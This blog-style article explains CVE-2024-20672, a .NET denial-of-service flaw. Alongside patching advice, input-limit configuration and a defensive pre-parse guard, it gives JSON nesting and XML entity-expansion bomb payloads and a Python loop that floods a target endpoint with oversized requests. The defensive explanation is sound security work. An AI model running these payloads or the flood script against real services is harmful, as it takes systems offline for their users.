CVE-2024-20672 - .NET Denial of Service Vulnerability – Explained, Explored, and Exploited
In January 2024, Microsoft published CVE-2024-20672, a denial of service (DoS) vulnerability in the .NET runtime. Any web application or microservice running on an affected, unpatched runtime can be taken offline by a remote attacker. In this article, we'll break down what the flaw is, how attackers can exploit it, and how you can protect your systems, complete with code snippets and references for further reading.
What Is CVE-2024-20672?
CVE-2024-20672 is a flaw in Microsoft's .NET runtime. It lets a remote attacker make an application consume excessive CPU or memory, which can crash the IIS application pool, the worker process, or the service itself.
In plain terms, an unauthenticated attacker who can reach your site or API over the network can knock it offline simply by sending specially crafted requests; no skill beyond constructing the payload is required.
- Vulnerable Products: .NET Framework 3.5 to 4.8, .NET Core 3.1, .NET 5/6/7 and ASP.NET are the runtimes named here. Treat Microsoft's advisory as the authoritative list of affected and fixed versions, and note that .NET Core 3.1 and .NET 5 were already out of support in January 2024, so on those runtimes the only remediation is to move to a supported one.
- Attack Results: excessive memory and CPU use, unresponsive servers, application restart loops, or a complete outage
Technical Details: How Does CVE-2024-20672 Work?
The vulnerability lies in how the .NET runtime handles certain malformed payloads, in particular during deserialization of structured input such as JSON or XML. A weaponized document tricks the parser into allocating very large amounts of memory or into processing that never finishes.
A single such request ties up one worker. An attacker who automates sending many of them exhausts the server's CPU and RAM in short order and locks out legitimate users.
Example vulnerable code
using System.Text.Json;
using Microsoft.AspNetCore.Mvc;

[ApiController]
[Route("api/[controller]")]
public class UploadController : ControllerBase
{
    [HttpPost]
    public IActionResult Upload([FromBody] JsonDocument data)
    {
        // Insecure: the entire request body is parsed into a JsonDocument
        // before this method runs, with no size or nesting limit of the
        // application's own. A deserialization bomb lands here unchallenged.
        return Ok("Received.");
    }
}
With CVE-2024-20672, a request carrying very large or deeply nested JSON can lock up or kill this endpoint, because the parser either allocates an absurd amount of memory or runs without terminating. One caveat worth knowing before you test this yourself: System.Text.Json enforces a default MaxDepth of 64 and throws a JsonException on deeper documents, so the nesting variant only bites where that guard is absent or raised. The size variant still costs memory proportional to the body, which is why body-size limits matter regardless of the parser.
Here is a skeleton exploit. Imagine an attacker POSTs this to your vulnerable .NET endpoint:
{
  "data": [[[ ... repeat hundreds of thousands of times ... ]]]
}
Or, for XML, a classic entity-expansion document:
<!DOCTYPE bomb [
  <!ENTITY a "aaaaaaaaaaaaaaaaaaaaaaaa...">
  <!ENTITY b "&a;&a;&a;&a;&a;&a;&a;&a;">
]>
<data>&b;</data>
These inputs cause the deserializer to either:
- build a massive object or array, exhausting memory, or
- expand entities recursively (the billion laughs pattern, exponential entity expansion), burning CPU and memory.
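To make the mechanism concrete, here is an added example (my own code, not from the article or from Microsoft) that constructs both payload shapes described above and runs a pre-parse guard over them. The guard measures JSON nesting depth with a streaming scan and computes how far the XML entities would expand without ever building the expanded text, which is the property you want in a check that sits in front of the real parser. The limits MAX_JSON_DEPTH and MAX_XML_EXPANSION, the helper names, and the sample documents are this example's own assumptions.

```python
"""
Added example (not the article's or Microsoft's code): construct the two
deserialization-bomb shapes and run a pre-parse guard over them. The guard
never builds the object graph or the expanded entity text, so its own cost
stays linear in the raw input size.
"""
import json
import re

MAX_JSON_DEPTH = 32         # assumption: the depth cap the article suggests
MAX_XML_EXPANSION = 10_000  # assumption: max characters entities may expand to


def nested_json(depth: int) -> str:
    """Constructed payload: {"data": [[[...]]]} nested `depth` levels deep."""
    return '{"data":' + '[' * depth + ']' * depth + '}'


def billion_laughs(levels: int, fanout: int = 10) -> str:
    """Constructed payload: e0 is 10 chars, each level references the previous
    one `fanout` times, so the body expands to 10 * fanout**(levels-1) chars."""
    decls = ['<!ENTITY e0 "' + 'a' * 10 + '">']
    for i in range(1, levels):
        decls.append(f'<!ENTITY e{i} "' + f'&e{i - 1};' * fanout + '">')
    return ('<!DOCTYPE bomb [\n' + '\n'.join(decls) + '\n]>\n'
            f'<data>&e{levels - 1};</data>')


def json_max_depth(text: str) -> int:
    """Streaming scan of bracket nesting; brackets inside strings are ignored."""
    depth = max_depth = 0
    in_string = escaped = False
    for ch in text:
        if in_string:
            if escaped:
                escaped = False
            elif ch == '\\':
                escaped = True
            elif ch == '"':
                in_string = False
            continue
        if ch == '"':
            in_string = True
        elif ch in '[{':
            depth += 1
            max_depth = max(max_depth, depth)
        elif ch in ']}':
            depth -= 1
    return max_depth


def check_json(text: str, max_depth: int = MAX_JSON_DEPTH) -> tuple:
    """Reject before parsing when nesting exceeds the cap."""
    depth = json_max_depth(text)
    if depth > max_depth:
        return False, f"nesting depth {depth} exceeds {max_depth}"
    return True, "ok"


ENTITY_DECL = re.compile(r'<!ENTITY\s+(\w+)\s+"([^"]*)"')
ENTITY_REF = re.compile(r'&(\w+);')


def xml_entity_expansion(doc: str) -> float:
    """Characters the body's entity references expand to, computed from the
    internal DTD subset by memoised recursion. Undeclared names (built-ins
    such as &amp;) count as 0; a self-referencing chain counts as infinite.
    External DTDs are not fetched and are not covered by this check."""
    decls = dict(ENTITY_DECL.findall(doc))
    memo = {}

    def size(name, stack=()):
        if name in stack:
            return float('inf')
        if name in memo:
            return memo[name]
        value = decls.get(name)
        if value is None:
            return 0
        total = len(ENTITY_REF.sub('', value))  # literal characters only
        for ref in ENTITY_REF.findall(value):
            total += size(ref, stack + (name,))
        memo[name] = total
        return total

    body = doc.split(']>', 1)[-1] if '<!DOCTYPE' in doc else doc
    return sum(size(ref) for ref in ENTITY_REF.findall(body))


def check_xml(doc: str, max_expansion: int = MAX_XML_EXPANSION) -> tuple:
    """Reject before parsing when declared entities would expand too far."""
    expansion = xml_entity_expansion(doc)
    if expansion > max_expansion:
        return False, f"entity expansion of {expansion} chars exceeds {max_expansion}"
    return True, "ok"


def stdlib_json_outcome(text: str) -> str:
    """What CPython's own json parser does with the payload: it does not hang,
    it aborts with RecursionError once nesting passes the interpreter limit."""
    try:
        json.loads(text)
        return "parsed"
    except RecursionError:
        return "RecursionError"


if __name__ == "__main__":
    bomb = nested_json(100_000)
    print(check_json(bomb), stdlib_json_outcome(bomb))
    print(check_xml(billion_laughs(9)), xml_entity_expansion(billion_laughs(9)))
```

The two numbers the guard produces are the whole story: a 200 KB nested payload reports a depth of 100,001, and a nine-level entity chain that is under 400 bytes on the wire reports an expansion of one billion characters. Either check runs in time linear in the raw input, which is why it belongs in front of the deserializer rather than after it.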
Automated DoS tool example:
In Python (to flood a .NET service):
import requests

# Valid JSON: one object holding a very large array of values.
# A deep-nesting variant is '{"data":' + '[' * 100000 + ']' * 100000 + '}'.
BAD_JSON = '{"data":[' + ','.join(['0'] * 100000) + ']}'

while True:
    requests.post("https://target/api/upload", data=BAD_JSON,
                  headers={"Content-Type": "application/json"})
If the server lacks validation and is unpatched, memory and CPU usage spike after only a handful of requests.
Who was most exposed:
- Public API endpoints accepting POST data without input size limits.
- Cloud-hosted .NET services, which could be crashed and restarted repeatedly within minutes.
Original advisory & references
- Microsoft Security Advisory CVE-2024-20672
- GitHub Security Announcement for dotnet/runtime
How to Protect Your Systems
1. Patch –
Update to the fixed runtime version listed in Microsoft's update guide for CVE-2024-20672. Runtimes that are out of support receive no fix and must be upgraded to a supported version.
2. Restrict JSON/XML Uploads –
Cap nesting depth and request body size so a hostile document is rejected before it costs memory, and parse XML with DTD processing prohibited (XmlReaderSettings.DtdProcessing = DtdProcessing.Prohibit, which is already the default for XmlReader.Create) so entity expansion never runs.
```csharp
// Example: cap JSON nesting depth and request body size in ASP.NET Core
var builder = WebApplication.CreateBuilder(args);
builder.Services.AddControllers().AddJsonOptions(o =>
{
    o.JsonSerializerOptions.MaxDepth = 32; // default is 64; lower it to what your API really needs
});
builder.WebHost.ConfigureKestrel(k =>
{
    k.Limits.MaxRequestBodySize = 1024 * 1024; // 1 MiB; Kestrel's default is about 30 MB
});
```
3. Web Server/Proxy Defenses –
Configure reverse proxies or load balancers (NGINX, IIS, or your cloud load balancer) to limit client upload size and concurrent connections per client (in NGINX, client_max_body_size together with limit_conn and limit_req), so oversized or flooding requests are dropped before they reach the application.
Final Thoughts
CVE-2024-20672 is a textbook denial of service risk, and a prime example of why safe input handling matters in modern .NET applications. Even a basic API controller becomes an easy target without explicit input limits and an up-to-date runtime.
Read more
- MSRC official CVE-2024-20672 disclosure
- Deep-dive technical write-up (.NET runtime issue)
- OWASP on Denial of Service
Timeline
Published on: 01/09/2024 18:15:50 UTC
Last modified on: 01/14/2024 22:48:45 UTC